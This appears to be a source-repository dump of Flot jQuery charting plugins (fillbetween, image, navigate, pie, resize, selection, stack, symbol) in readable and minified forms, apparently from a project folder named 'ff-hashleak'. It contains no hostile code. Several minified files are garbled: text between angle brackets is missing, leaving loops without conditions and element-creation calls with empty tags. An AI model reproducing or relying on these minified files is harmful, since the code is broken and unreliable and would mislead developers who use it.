options: options, 180 | name: 'fillbetween', 181 | version: '1.0' 182 | }); 183 | })(jQuery); 184 | -------------------------------------------------------------------------------- /ff-hashleak/flot/jquery.flot.fillbetween.min.js: -------------------------------------------------------------------------------- 1 | (function(b){var a={series:{fillBetween:null}};function c(f){function d(j,h){var g;for(g=0;g=h.length){return null}return h[g]}return null}function e(B,u,g){if(u.fillBetween==null){return}var p=d(u,B.getData());if(!p){return}var y=g.pointsize,E=g.points,h=p.datapoints.pointsize,x=p.datapoints.points,r=[],w,v,k,G,F,q,t=u.lines.show,o=y>2&&g.format[2].y,n=t&&u.lines.steps,D=true,C=0,A=0,z;while(true){if(C>=E.length){break}z=r.length;if(E[C]==null){for(m=0;m=x.length){if(!t){for(m=0;mG){if(t&&C>0&&E[C-y]!=null){k=v+(E[C-y+1]-v)*(G-w)/(E[C-y]-w);r.push(G);r.push(k);for(m=2;m0&&x[A-h]!=null){q=F+(x[A-h+1]-F)*(w-G)/(x[A-h]-G)}C+=y}}D=false;if(z!=r.length&&o){r[z+2]=q}}}}if(n&&z!=r.length&&z>0&&r[z]!=null&&r[z]!=r[z-y]&&r[z+1]!=r[z-y+1]){for(m=0;m').load(handler).error(handler).attr('src', url); 112 | }); 113 | } 114 | 115 | function drawSeries(plot, ctx, series) { 116 | var plotOffset = plot.getPlotOffset(); 117 | 118 | if (!series.images || !series.images.show) 119 | return; 120 | 121 | var points = series.datapoints.points, 122 | ps = series.datapoints.pointsize; 123 | 124 | for (var i = 0; i < points.length; i += ps) { 125 | var img = points[i], 126 | x1 = points[i + 1], y1 = points[i + 2], 127 | x2 = points[i + 3], y2 = points[i + 4], 128 | xaxis = series.xaxis, yaxis = series.yaxis, 129 | tmp; 130 | 131 | // actually we should check img.complete, but it 132 | // appears to be a somewhat unreliable indicator in 133 | // IE6 (false even after load event) 134 | if (!img || img.width <= 0 || img.height <= 0) 135 | continue; 136 | 137 | if (x1 > x2) { 138 | tmp = x2; 139 | x2 = x1; 140 | x1 = tmp; 141 | } 142 | if (y1 > y2) { 143 | tmp = y2; 144 | y2 = y1; 145 | y1 = tmp; 146 | } 147 | 148 | // if the anchor is at the center of the pixel, expand the 149 | // image by 1/2 pixel in each direction 150 | if (series.images.anchor == "center") { 151 | tmp = 0.5 * (x2-x1) / (img.width - 1); 152 | x1 -= tmp; 153 | x2 += tmp; 154 | tmp = 0.5 * (y2-y1) / (img.height - 1); 155 | y1 -= tmp; 156 | y2 += tmp; 157 | } 158 | 159 | // clip 160 | if (x1 == x2 || y1 == y2 || 161 | x1 >= xaxis.max || x2 <= xaxis.min || 162 | y1 >= yaxis.max || y2 <= yaxis.min) 163 | continue; 164 | 165 | var sx1 = 0, sy1 = 0, sx2 = img.width, sy2 = img.height; 166 | if (x1 < xaxis.min) { 167 | sx1 += (sx2 - sx1) * (xaxis.min - x1) / (x2 - x1); 168 | x1 = xaxis.min; 169 | } 170 | 171 | if (x2 > xaxis.max) { 172 | sx2 += (sx2 - sx1) * (xaxis.max - x2) / (x2 - x1); 173 | x2 = xaxis.max; 174 | } 175 | 176 | if (y1 < yaxis.min) { 177 | sy2 += (sy1 - sy2) * (yaxis.min - y1) / (y2 - y1); 178 | y1 = yaxis.min; 179 | } 180 | 181 | if (y2 > yaxis.max) { 182 | sy1 += (sy1 - sy2) * (yaxis.max - y2) / (y2 - y1); 183 | y2 = yaxis.max; 184 | } 185 | 186 | x1 = xaxis.p2c(x1); 187 | x2 = xaxis.p2c(x2); 188 | y1 = yaxis.p2c(y1); 189 | y2 = yaxis.p2c(y2); 190 | 191 | // the transformation may have swapped us 192 | if (x1 > x2) { 193 | tmp = x2; 194 | x2 = x1; 195 | x1 = tmp; 196 | } 197 | if (y1 > y2) { 198 | tmp = y2; 199 | y2 = y1; 200 | y1 = tmp; 201 | } 202 | 203 | tmp = ctx.globalAlpha; 204 | ctx.globalAlpha *= series.images.alpha; 205 | ctx.drawImage(img, 206 | sx1, sy1, sx2 - sx1, sy2 - sy1, 207 | x1 + plotOffset.left, y1 + plotOffset.top, 208 | x2 - x1, y2 - y1); 209 | ctx.globalAlpha = tmp; 210 | } 211 | } 212 | 213 | function processRawData(plot, series, data, datapoints) { 214 | if (!series.images.show) 215 | return; 216 | 217 | // format is Image, x1, y1, x2, y2 (opposite corners) 218 | datapoints.format = [ 219 | { required: true }, 220 | { x: true, number: true, required: true }, 221 | { y: true, number: true, required: true }, 222 | { x: true, number: true, required: true }, 223 | { y: true, number: true, required: true } 224 | ]; 225 | } 226 | 227 | function init(plot) { 228 | plot.hooks.processRawData.push(processRawData); 229 | plot.hooks.drawSeries.push(drawSeries); 230 | } 231 | 232 | $.plot.plugins.push({ 233 | init: init, 234 | options: options, 235 | name: 'image', 236 | version: '1.1' 237 | }); 238 | })(jQuery); 239 | -------------------------------------------------------------------------------- /ff-hashleak/flot/jquery.flot.image.min.js: -------------------------------------------------------------------------------- 1 | (function(c){var a={series:{images:{show:false,alpha:1,anchor:"corner"}}};c.plot.image={};c.plot.image.loadDataImages=function(g,f,k){var j=[],h=[];var i=f.series.images.show;c.each(g,function(l,m){if(!(i||m.images.show)){return}if(m.data){m=m.data}c.each(m,function(n,o){if(typeof o[0]=="string"){j.push(o[0]);h.push(o)}})});c.plot.image.load(j,function(l){c.each(h,function(n,o){var m=o[0];if(l[m]){o[0]=l[m]}});k()})};c.plot.image.load=function(h,i){var g=h.length,f={};if(g==0){i({})}c.each(h,function(k,j){var l=function(){--g;f[j]=this;if(g==0){i(f)}};c("").load(l).error(l).attr("src",j)})};function d(q,o,l){var m=q.getPlotOffset();if(!l.images||!l.images.show){return}var r=l.datapoints.points,n=l.datapoints.pointsize;for(var t=0;tv){x=v;v=w;w=x}if(g>f){x=f;f=g;g=x}if(l.images.anchor=="center"){x=0.5*(v-w)/(y.width-1);w-=x;v+=x;x=0.5*(f-g)/(y.height-1);g-=x;f+=x}if(w==v||g==f||w>=h.max||v<=h.min||g>=u.max||f<=u.min){continue}var k=0,s=0,j=y.width,p=y.height;if(wh.max){j+=(j-k)*(h.max-v)/(v-w);v=h.max}if(gu.max){s+=(s-p)*(u.max-f)/(f-g);f=u.max}w=h.p2c(w);v=h.p2c(v);g=u.p2c(g);f=u.p2c(f);if(w>v){x=v;v=w;w=x}if(g>f){x=f;f=g;g=x}x=o.globalAlpha;o.globalAlpha*=l.images.alpha;o.drawImage(y,k,s,j-k,p-s,w+m.left,g+m.top,v-w,f-g);o.globalAlpha=x}}function b(i,f,g,h){if(!f.images.show){return}h.format=[{required:true},{x:true,number:true,required:true},{y:true,number:true,required:true},{x:true,number:true,required:true},{y:true,number:true,required:true}]}function e(f){f.hooks.processRawData.push(b);f.hooks.drawSeries.push(d)}c.plot.plugins.push({init:e,options:a,name:"image",version:"1.1"})})(jQuery); -------------------------------------------------------------------------------- /ff-hashleak/flot/jquery.flot.navigate.min.js: -------------------------------------------------------------------------------- 1 | (function(i){i.fn.drag=function(j,k,l){if(k){this.bind("dragstart",j)}if(l){this.bind("dragend",l)}return !j?this.trigger("drag"):this.bind("drag",k?k:j)};var d=i.event,c=d.special,h=c.drag={not:":input",distance:0,which:1,dragging:false,setup:function(j){j=i.extend({distance:h.distance,which:h.which,not:h.not},j||{});j.distance=e(j.distance);d.add(this,"mousedown",f,j);if(this.attachEvent){this.attachEvent("ondragstart",a)}},teardown:function(){d.remove(this,"mousedown",f);if(this===h.dragging){h.dragging=h.proxy=false}g(this,true);if(this.detachEvent){this.detachEvent("ondragstart",a)}}};c.dragstart=c.dragend={setup:function(){},teardown:function(){}};function f(j){var k=this,l,m=j.data||{};if(m.elem){k=j.dragTarget=m.elem;j.dragProxy=h.proxy||k;j.cursorOffsetX=m.pageX-m.left;j.cursorOffsetY=m.pageY-m.top;j.offsetX=j.pageX-j.cursorOffsetX;j.offsetY=j.pageY-j.cursorOffsetY}else{if(h.dragging||(m.which>0&&j.which!=m.which)||i(j.target).is(m.not)){return}}switch(j.type){case"mousedown":i.extend(m,i(k).offset(),{elem:k,target:j.target,pageX:j.pageX,pageY:j.pageY});d.add(document,"mousemove mouseup",f,m);g(k,false);h.dragging=null;return false;case !h.dragging&&"mousemove":if(e(j.pageX-m.pageX)+e(j.pageY-m.pageY)w){var A=B;B=w;w=A}var y=w-B;if(E&&((E[0]!=null&&yE[1]))){return}D.min=B;D.max=w});o.setupGrid();o.draw();if(!q.preventEvent){o.getPlaceholder().trigger("plotzoom",[o])}};o.pan=function(p){var q={x:+p.left,y:+p.top};if(isNaN(q.x)){q.x=0}if(isNaN(q.y)){q.y=0}b.each(o.getAxes(),function(s,u){var v=u.options,t,r,w=q[u.direction];t=u.c2p(u.p2c(u.min)+w),r=u.c2p(u.p2c(u.max)+w);var x=v.panRange;if(x===false){return}if(x){if(x[0]!=null&&x[0]>t){w=x[0]-t;t+=w;r+=w}if(x[1]!=null&&x[1]1){N.series.pie.tilt=1}if(N.series.pie.tilt<0){N.series.pie.tilt=0}O.hooks.processDatapoints.push(E);O.hooks.drawOverlay.push(H);O.hooks.draw.push(r)}}function e(P,N){var O=P.getOptions();if(O.series.pie.show&&O.grid.hoverable){N.unbind("mousemove").mousemove(t)}if(O.series.pie.show&&O.grid.clickable){N.unbind("click").click(l)}}function G(O){var P="";function N(S,T){if(!T){T=0}for(var R=0;Rh.width-n){B=h.width-n}}}function v(O){for(var N=0;N0){R.push({data:[[1,P]],color:N,label:a.series.pie.combine.label,angle:(P*(Math.PI*2))/M,percent:(P/M*100)})}return R}function r(S,Q){if(!L){return}ctx=Q;I();var T=S.getData();var P=0;while(F&&P0){n*=w}P+=1;N();if(a.series.pie.tilt<=0.8){O()}R()}if(P>=o){N();L.prepend('

Could not draw pie with labels contained inside canvas

')}if(S.setSeries&&S.insertLegend){S.setSeries(T);S.insertLegend()}function N(){ctx.clearRect(0,0,h.width,h.height);L.children().filter(".pieLabel, .pieLabelBackground").remove()}function O(){var Z=5;var Y=15;var W=10;var X=0.02;if(a.series.pie.radius>1){var U=a.series.pie.radius}else{var U=n*a.series.pie.radius}if(U>=(h.width/2)-Z||U*a.series.pie.tilt>=(h.height/2)-Y||U<=W){return}ctx.save();ctx.translate(Z,Y);ctx.globalAlpha=X;ctx.fillStyle="#000";ctx.translate(B,p);ctx.scale(1,a.series.pie.tilt);for(var V=1;V<=W;V++){ctx.beginPath();ctx.arc(0,0,U,0,Math.PI*2,false);ctx.fill();U-=V}ctx.restore()}function R(){startAngle=Math.PI*a.series.pie.startAngle;if(a.series.pie.radius>1){var U=a.series.pie.radius}else{var U=n*a.series.pie.radius}ctx.save();ctx.translate(B,p);ctx.scale(1,a.series.pie.tilt);ctx.save();var Y=startAngle;for(var W=0;W1e-9){ctx.moveTo(0,0)}else{if(b.browser.msie){ab-=0.0001}}ctx.arc(0,0,U,Y,Y+ab,false);ctx.closePath();Y+=ab;if(aa){ctx.fill()}else{ctx.stroke()}}function V(){var ac=startAngle;if(a.series.pie.label.radius>1){var Z=a.series.pie.label.radius}else{var Z=n*a.series.pie.label.radius}for(var ab=0;ab=a.series.pie.label.threshold*100){aa(T[ab],ac,ab)}ac+=T[ab].angle}function aa(ap,ai,ag){if(ap.data[0][1]==0){return}var ar=a.legend.labelFormatter,aq,ae=a.series.pie.label.formatter;if(ar){aq=ar(ap.label,ap)}else{aq=ap.label}if(ae){aq=ae(aq,ap)}var aj=((ai+ap.angle)+ai)/2;var ao=B+Math.round(Math.cos(aj)*Z);var am=p+Math.round(Math.sin(aj)*Z)*a.series.pie.tilt;var af=''+aq+"";L.append(af);var an=L.children("#pieLabel"+ag);var ad=(am-an.height()/2);var ah=(ao-an.width()/2);an.css("top",ad);an.css("left",ah);if(0-ad>0||0-ah>0||h.height-(ad+an.height())<0||h.width-(ah+an.width())<0){F=true}if(a.series.pie.label.background.opacity!=0){var ak=a.series.pie.label.background.color;if(ak==null){ak=ap.color}var al="top:"+ad+"px;left:"+ah+"px;";b('

').insertBefore(an).css("opacity",a.series.pie.label.background.opacity)}}}}}function J(N){if(a.series.pie.innerRadius>0){N.save();innerRadius=a.series.pie.innerRadius>1?a.series.pie.innerRadius:n*a.series.pie.innerRadius;N.globalCompositeOperation="destination-out";N.beginPath();N.fillStyle=a.series.pie.stroke.color;N.arc(0,0,innerRadius,0,Math.PI*2,false);N.fill();N.closePath();N.restore();N.save();N.beginPath();N.strokeStyle=a.series.pie.stroke.color;N.arc(0,0,innerRadius,0,Math.PI*2,false);N.stroke();N.closePath();N.restore()}}function s(Q,R){for(var S=false,P=-1,N=Q.length,O=N-1;++P1?O.series.pie.radius:n*O.series.pie.radius;for(var Q=0;Q1?P.series.pie.radius:n*P.series.pie.radius;R.save();R.translate(B,p);R.scale(1,P.series.pie.tilt);for(i=0;i1e-9){R.moveTo(0,0)}R.arc(0,0,N,S.startAngle,S.startAngle+S.angle,false);R.closePath();R.fill()}}}var a={series:{pie:{show:false,radius:"auto",innerRadius:0,startAngle:3/2,tilt:1,offset:{top:0,left:"auto"},stroke:{color:"#FFF",width:1},label:{show:"auto",formatter:function(d,e){return'

'+d+"
"+Math.round(e.percent)+"%

"},radius:1,background:{color:null,opacity:0},threshold:0},combine:{threshold:-1,color:null,label:"Other"},highlight:{opacity:0.5}}}};b.plot.plugins.push({init:c,options:a,name:"pie",version:"1.0"})})(jQuery); -------------------------------------------------------------------------------- /ff-hashleak/flot/jquery.flot.resize.js: -------------------------------------------------------------------------------- 1 | /* 2 | Flot plugin for automatically redrawing plots when the placeholder 3 | size changes, e.g. on window resizes. 4 | 5 | It works by listening for changes on the placeholder div (through the 6 | jQuery resize event plugin) - if the size changes, it will redraw the 7 | plot. 8 | 9 | There are no options. If you need to disable the plugin for some 10 | plots, you can just fix the size of their placeholders. 11 | */ 12 | 13 | 14 | /* Inline dependency: 15 | * jQuery resize event - v1.1 - 3/14/2010 16 | * http://benalman.com/projects/jquery-resize-plugin/ 17 | * 18 | * Copyright (c) 2010 "Cowboy" Ben Alman 19 | * Dual licensed under the MIT and GPL licenses. 20 | * http://benalman.com/about/license/ 21 | */ 22 | (function($,h,c){var a=$([]),e=$.resize=$.extend($.resize,{}),i,k="setTimeout",j="resize",d=j+"-special-event",b="delay",f="throttleWindow";e[b]=250;e[f]=true;$.event.special[j]={setup:function(){if(!e[f]&&this[k]){return false}var l=$(this);a=a.add(l);$.data(this,d,{w:l.width(),h:l.height()});if(a.length===1){g()}},teardown:function(){if(!e[f]&&this[k]){return false}var l=$(this);a=a.not(l);l.removeData(d);if(!a.length){clearTimeout(i)}},add:function(l){if(!e[f]&&this[k]){return false}var n;function m(s,o,p){var q=$(this),r=$.data(this,d);r.w=o!==c?o:q.width();r.h=p!==c?p:q.height();n.apply(this,arguments)}if($.isFunction(l)){n=l;return m}else{n=l.handler;l.handler=m}}};function g(){i=h[k](function(){a.each(function(){var n=$(this),m=n.width(),l=n.height(),o=$.data(this,d);if(m!==o.w||l!==o.h){n.trigger(j,[o.w=m,o.h=l])}});g()},e[b])}})(jQuery,this); 23 | 24 | 25 | (function ($) { 26 | var options = { }; // no options 27 | 28 | function init(plot) { 29 | function onResize() { 30 | var placeholder = plot.getPlaceholder(); 31 | 32 | // somebody might have hidden us and we can't plot 33 | // when we don't have the dimensions 34 | if (placeholder.width() == 0 || placeholder.height() == 0) 35 | return; 36 | 37 | plot.resize(); 38 | plot.setupGrid(); 39 | plot.draw(); 40 | } 41 | 42 | function bindEvents(plot, eventHolder) { 43 | plot.getPlaceholder().resize(onResize); 44 | } 45 | 46 | function shutdown(plot, eventHolder) { 47 | plot.getPlaceholder().unbind("resize", onResize); 48 | } 49 | 50 | plot.hooks.bindEvents.push(bindEvents); 51 | plot.hooks.shutdown.push(shutdown); 52 | } 53 | 54 | $.plot.plugins.push({ 55 | init: init, 56 | options: options, 57 | name: 'resize', 58 | version: '1.0' 59 | }); 60 | })(jQuery); 61 | -------------------------------------------------------------------------------- /ff-hashleak/flot/jquery.flot.resize.min.js: -------------------------------------------------------------------------------- 1 | (function(n,p,u){var w=n([]),s=n.resize=n.extend(n.resize,{}),o,l="setTimeout",m="resize",t=m+"-special-event",v="delay",r="throttleWindow";s[v]=250;s[r]=true;n.event.special[m]={setup:function(){if(!s[r]&&this[l]){return false}var a=n(this);w=w.add(a);n.data(this,t,{w:a.width(),h:a.height()});if(w.length===1){q()}},teardown:function(){if(!s[r]&&this[l]){return false}var a=n(this);w=w.not(a);a.removeData(t);if(!w.length){clearTimeout(o)}},add:function(b){if(!s[r]&&this[l]){return false}var c;function a(d,h,g){var f=n(this),e=n.data(this,t);e.w=h!==u?h:f.width();e.h=g!==u?g:f.height();c.apply(this,arguments)}if(n.isFunction(b)){c=b;return a}else{c=b.handler;b.handler=a}}};function q(){o=p[l](function(){w.each(function(){var d=n(this),a=d.width(),b=d.height(),c=n.data(this,t);if(a!==c.w||b!==c.h){d.trigger(m,[c.w=a,c.h=b])}});q()},s[v])}})(jQuery,this);(function(b){var a={};function c(f){function e(){var h=f.getPlaceholder();if(h.width()==0||h.height()==0){return}f.resize();f.setupGrid();f.draw()}function g(i,h){i.getPlaceholder().resize(e)}function d(i,h){i.getPlaceholder().unbind("resize",e)}f.hooks.bindEvents.push(g);f.hooks.shutdown.push(d)}b.plot.plugins.push({init:c,options:a,name:"resize",version:"1.0"})})(jQuery); -------------------------------------------------------------------------------- /ff-hashleak/flot/jquery.flot.selection.min.js: -------------------------------------------------------------------------------- 1 | (function(a){function b(k){var p={first:{x:-1,y:-1},second:{x:-1,y:-1},show:false,active:false};var m={};var r=null;function e(s){if(p.active){l(s);k.getPlaceholder().trigger("plotselecting",[g()])}}function n(s){if(s.which!=1){return}document.body.focus();if(document.onselectstart!==undefined&&m.onselectstart==null){m.onselectstart=document.onselectstart;document.onselectstart=function(){return false}}if(document.ondrag!==undefined&&m.ondrag==null){m.ondrag=document.ondrag;document.ondrag=function(){return false}}d(p.first,s);p.active=true;r=function(t){j(t)};a(document).one("mouseup",r)}function j(s){r=null;if(document.onselectstart!==undefined){document.onselectstart=m.onselectstart}if(document.ondrag!==undefined){document.ondrag=m.ondrag}p.active=false;l(s);if(f()){i()}else{k.getPlaceholder().trigger("plotunselected",[]);k.getPlaceholder().trigger("plotselecting",[null])}return false}function g(){if(!f()){return null}var u={},t=p.first,s=p.second;a.each(k.getAxes(),function(v,w){if(w.used){var y=w.c2p(t[w.direction]),x=w.c2p(s[w.direction]);u[v]={from:Math.min(y,x),to:Math.max(y,x)}}});return u}function i(){var s=g();k.getPlaceholder().trigger("plotselected",[s]);if(s.xaxis&&s.yaxis){k.getPlaceholder().trigger("selected",[{x1:s.xaxis.from,y1:s.yaxis.from,x2:s.xaxis.to,y2:s.yaxis.to}])}}function h(t,u,s){return us?s:u)}function d(w,t){var v=k.getOptions();var u=k.getPlaceholder().offset();var s=k.getPlotOffset();w.x=h(0,t.pageX-u.left-s.left,k.width());w.y=h(0,t.pageY-u.top-s.top,k.height());if(v.selection.mode=="y"){w.x=w==p.first?0:k.width()}if(v.selection.mode=="x"){w.y=w==p.first?0:k.height()}}function l(s){if(s.pageX==null){return}d(p.second,s);if(f()){p.show=true;k.triggerRedrawOverlay()}else{q(true)}}function q(s){if(p.show){p.show=false;k.triggerRedrawOverlay();if(!s){k.getPlaceholder().trigger("plotunselected",[])}}}function c(s,w){var t,y,z,A,x=k.getAxes();for(var u in x){t=x[u];if(t.direction==w){A=w+t.n+"axis";if(!s[A]&&t.n==1){A=w+"axis"}if(s[A]){y=s[A].from;z=s[A].to;break}}}if(!s[A]){t=w=="x"?k.getXAxes()[0]:k.getYAxes()[0];y=s[w+"1"];z=s[w+"2"]}if(y!=null&&z!=null&&y>z){var v=y;y=z;z=v}return{from:y,to:z,axis:t}}function o(t,s){var v,u,w=k.getOptions();if(w.selection.mode=="y"){p.first.x=0;p.second.x=k.width()}else{u=c(t,"x");p.first.x=u.axis.p2c(u.from);p.second.x=u.axis.p2c(u.to)}if(w.selection.mode=="x"){p.first.y=0;p.second.y=k.height()}else{u=c(t,"y");p.first.y=u.axis.p2c(u.from);p.second.y=u.axis.p2c(u.to)}p.show=true;k.triggerRedrawOverlay();if(!s&&f()){i()}}function f(){var s=5;return Math.abs(p.second.x-p.first.x)>=s&&Math.abs(p.second.y-p.first.y)>=s}k.clearSelection=q;k.setSelection=o;k.getSelection=g;k.hooks.bindEvents.push(function(t,s){var u=t.getOptions();if(u.selection.mode!=null){s.mousemove(e);s.mousedown(n)}});k.hooks.drawOverlay.push(function(v,D){if(p.show&&f()){var t=v.getPlotOffset();var s=v.getOptions();D.save();D.translate(t.left,t.top);var z=a.color.parse(s.selection.color);D.strokeStyle=z.scale("a",0.8).toString();D.lineWidth=1;D.lineJoin="round";D.fillStyle=z.scale("a",0.4).toString();var B=Math.min(p.first.x,p.second.x),A=Math.min(p.first.y,p.second.y),C=Math.abs(p.second.x-p.first.x),u=Math.abs(p.second.y-p.first.y);D.fillRect(B,A,C,u);D.strokeRect(B,A,C,u);D.restore()}});k.hooks.shutdown.push(function(t,s){s.unbind("mousemove",e);s.unbind("mousedown",n);if(r){a(document).unbind("mouseup",r)}})}a.plot.plugins.push({init:b,options:{selection:{mode:null,color:"#e8cfac"}},name:"selection",version:"1.1"})})(jQuery); -------------------------------------------------------------------------------- /ff-hashleak/flot/jquery.flot.stack.js: -------------------------------------------------------------------------------- 1 | /* 2 | Flot plugin for stacking data sets, i.e. putting them on top of each 3 | other, for accumulative graphs. 4 | 5 | The plugin assumes the data is sorted on x (or y if stacking 6 | horizontally). For line charts, it is assumed that if a line has an 7 | undefined gap (from a null point), then the line above it should have 8 | the same gap - insert zeros instead of "null" if you want another 9 | behaviour. This also holds for the start and end of the chart. Note 10 | that stacking a mix of positive and negative values in most instances 11 | doesn't make sense (so it looks weird). 12 | 13 | Two or more series are stacked when their "stack" attribute is set to 14 | the same key (which can be any number or string or just "true"). To 15 | specify the default stack, you can set 16 | 17 | series: { 18 | stack: null or true or key (number/string) 19 | } 20 | 21 | or specify it for a specific series 22 | 23 | $.plot($("#placeholder"), [{ data: [ ... ], stack: true }]) 24 | 25 | The stacking order is determined by the order of the data series in 26 | the array (later series end up on top of the previous). 27 | 28 | Internally, the plugin modifies the datapoints in each series, adding 29 | an offset to the y value. For line series, extra data points are 30 | inserted through interpolation. If there's a second y value, it's also 31 | adjusted (e.g for bar charts or filled areas). 32 | */ 33 | 34 | (function ($) { 35 | var options = { 36 | series: { stack: null } // or number/string 37 | }; 38 | 39 | function init(plot) { 40 | function findMatchingSeries(s, allseries) { 41 | var res = null 42 | for (var i = 0; i < allseries.length; ++i) { 43 | if (s == allseries[i]) 44 | break; 45 | 46 | if (allseries[i].stack == s.stack) 47 | res = allseries[i]; 48 | } 49 | 50 | return res; 51 | } 52 | 53 | function stackData(plot, s, datapoints) { 54 | if (s.stack == null) 55 | return; 56 | 57 | var other = findMatchingSeries(s, plot.getData()); 58 | if (!other) 59 | return; 60 | 61 | var ps = datapoints.pointsize, 62 | points = datapoints.points, 63 | otherps = other.datapoints.pointsize, 64 | otherpoints = other.datapoints.points, 65 | newpoints = [], 66 | px, py, intery, qx, qy, bottom, 67 | withlines = s.lines.show, 68 | horizontal = s.bars.horizontal, 69 | withbottom = ps > 2 && (horizontal ? datapoints.format[2].x : datapoints.format[2].y), 70 | withsteps = withlines && s.lines.steps, 71 | fromgap = true, 72 | keyOffset = horizontal ? 1 : 0, 73 | accumulateOffset = horizontal ? 0 : 1, 74 | i = 0, j = 0, l; 75 | 76 | while (true) { 77 | if (i >= points.length) 78 | break; 79 | 80 | l = newpoints.length; 81 | 82 | if (points[i] == null) { 83 | // copy gaps 84 | for (m = 0; m < ps; ++m) 85 | newpoints.push(points[i + m]); 86 | i += ps; 87 | } 88 | else if (j >= otherpoints.length) { 89 | // for lines, we can't use the rest of the points 90 | if (!withlines) { 91 | for (m = 0; m < ps; ++m) 92 | newpoints.push(points[i + m]); 93 | } 94 | i += ps; 95 | } 96 | else if (otherpoints[j] == null) { 97 | // oops, got a gap 98 | for (m = 0; m < ps; ++m) 99 | newpoints.push(null); 100 | fromgap = true; 101 | j += otherps; 102 | } 103 | else { 104 | // cases where we actually got two points 105 | px = points[i + keyOffset]; 106 | py = points[i + accumulateOffset]; 107 | qx = otherpoints[j + keyOffset]; 108 | qy = otherpoints[j + accumulateOffset]; 109 | bottom = 0; 110 | 111 | if (px == qx) { 112 | for (m = 0; m < ps; ++m) 113 | newpoints.push(points[i + m]); 114 | 115 | newpoints[l + accumulateOffset] += qy; 116 | bottom = qy; 117 | 118 | i += ps; 119 | j += otherps; 120 | } 121 | else if (px > qx) { 122 | // we got past point below, might need to 123 | // insert interpolated extra point 124 | if (withlines && i > 0 && points[i - ps] != null) { 125 | intery = py + (points[i - ps + accumulateOffset] - py) * (qx - px) / (points[i - ps + keyOffset] - px); 126 | newpoints.push(qx); 127 | newpoints.push(intery + qy); 128 | for (m = 2; m < ps; ++m) 129 | newpoints.push(points[i + m]); 130 | bottom = qy; 131 | } 132 | 133 | j += otherps; 134 | } 135 | else { // px < qx 136 | if (fromgap && withlines) { 137 | // if we come from a gap, we just skip this point 138 | i += ps; 139 | continue; 140 | } 141 | 142 | for (m = 0; m < ps; ++m) 143 | newpoints.push(points[i + m]); 144 | 145 | // we might be able to interpolate a point below, 146 | // this can give us a better y 147 | if (withlines && j > 0 && otherpoints[j - otherps] != null) 148 | bottom = qy + (otherpoints[j - otherps + accumulateOffset] - qy) * (px - qx) / (otherpoints[j - otherps + keyOffset] - qx); 149 | 150 | newpoints[l + accumulateOffset] += bottom; 151 | 152 | i += ps; 153 | } 154 | 155 | fromgap = false; 156 | 157 | if (l != newpoints.length && withbottom) 158 | newpoints[l + 2] += bottom; 159 | } 160 | 161 | // maintain the line steps invariant 162 | if (withsteps && l != newpoints.length && l > 0 163 | && newpoints[l] != null 164 | && newpoints[l] != newpoints[l - ps] 165 | && newpoints[l + 1] != newpoints[l - ps + 1]) { 166 | for (m = 0; m < ps; ++m) 167 | newpoints[l + ps + m] = newpoints[l + m]; 168 | newpoints[l + 1] = newpoints[l - ps + 1]; 169 | } 170 | } 171 | 172 | datapoints.points = newpoints; 173 | } 174 | 175 | plot.hooks.processDatapoints.push(stackData); 176 | } 177 | 178 | $.plot.plugins.push({ 179 | init: init, 180 | options: options, 181 | name: 'stack', 182 | version: '1.2' 183 | }); 184 | })(jQuery); 185 | -------------------------------------------------------------------------------- /ff-hashleak/flot/jquery.flot.stack.min.js: -------------------------------------------------------------------------------- 1 | (function(b){var a={series:{stack:null}};function c(f){function d(k,j){var h=null;for(var g=0;g2&&(G?g.format[2].x:g.format[2].y),n=u&&v.lines.steps,E=true,q=G?1:0,H=G?0:1,D=0,B=0,A;while(true){if(D>=F.length){break}A=t.length;if(F[D]==null){for(m=0;m=y.length){if(!u){for(m=0;mJ){if(u&&D>0&&F[D-z]!=null){k=w+(F[D-z+H]-w)*(J-x)/(F[D-z+q]-x);t.push(J);t.push(k+I);for(m=2;m0&&y[B-h]!=null){r=I+(y[B-h+H]-I)*(x-J)/(y[B-h+q]-J)}t[A+H]+=r;D+=z}}E=false;if(A!=t.length&&o){t[A+2]+=r}}}}if(n&&A!=t.length&&A>0&&t[A]!=null&&t[A]!=t[A-z]&&t[A+1]!=t[A-z+1]){for(m=0;m s = r * sqrt(pi)/2 23 | var size = radius * Math.sqrt(Math.PI) / 2; 24 | ctx.rect(x - size, y - size, size + size, size + size); 25 | }, 26 | diamond: function (ctx, x, y, radius, shadow) { 27 | // pi * r^2 = 2s^2 => s = r * sqrt(pi/2) 28 | var size = radius * Math.sqrt(Math.PI / 2); 29 | ctx.moveTo(x - size, y); 30 | ctx.lineTo(x, y - size); 31 | ctx.lineTo(x + size, y); 32 | ctx.lineTo(x, y + size); 33 | ctx.lineTo(x - size, y); 34 | }, 35 | triangle: function (ctx, x, y, radius, shadow) { 36 | // pi * r^2 = 1/2 * s^2 * sin (pi / 3) => s = r * sqrt(2 * pi / sin(pi / 3)) 37 | var size = radius * Math.sqrt(2 * Math.PI / Math.sin(Math.PI / 3)); 38 | var height = size * Math.sin(Math.PI / 3); 39 | ctx.moveTo(x - size/2, y + height/2); 40 | ctx.lineTo(x + size/2, y + height/2); 41 | if (!shadow) { 42 | ctx.lineTo(x, y - height/2); 43 | ctx.lineTo(x - size/2, y + height/2); 44 | } 45 | }, 46 | cross: function (ctx, x, y, radius, shadow) { 47 | // pi * r^2 = (2s)^2 => s = r * sqrt(pi)/2 48 | var size = radius * Math.sqrt(Math.PI) / 2; 49 | ctx.moveTo(x - size, y - size); 50 | ctx.lineTo(x + size, y + size); 51 | ctx.moveTo(x - size, y + size); 52 | ctx.lineTo(x + size, y - size); 53 | } 54 | } 55 | 56 | var s = series.points.symbol; 57 | if (handlers[s]) 58 | series.points.symbol = handlers[s]; 59 | } 60 | 61 | function init(plot) { 62 | plot.hooks.processDatapoints.push(processRawData); 63 | } 64 | 65 | $.plot.plugins.push({ 66 | init: init, 67 | name: 'symbols', 68 | version: '1.0' 69 | }); 70 | })(jQuery); 71 | -------------------------------------------------------------------------------- /ff-hashleak/flot/jquery.flot.symbol.min.js: -------------------------------------------------------------------------------- 1 | (function(b){function a(h,e,g){var d={square:function(k,j,n,i,m){var l=i*Math.sqrt(Math.PI)/2;k.rect(j-l,n-l,l+l,l+l)},diamond:function(k,j,n,i,m){var l=i*Math.sqrt(Math.PI/2);k.moveTo(j-l,n);k.lineTo(j,n-l);k.lineTo(j+l,n);k.lineTo(j,n+l);k.lineTo(j-l,n)},triangle:function(l,k,o,j,n){var m=j*Math.sqrt(2*Math.PI/Math.sin(Math.PI/3));var 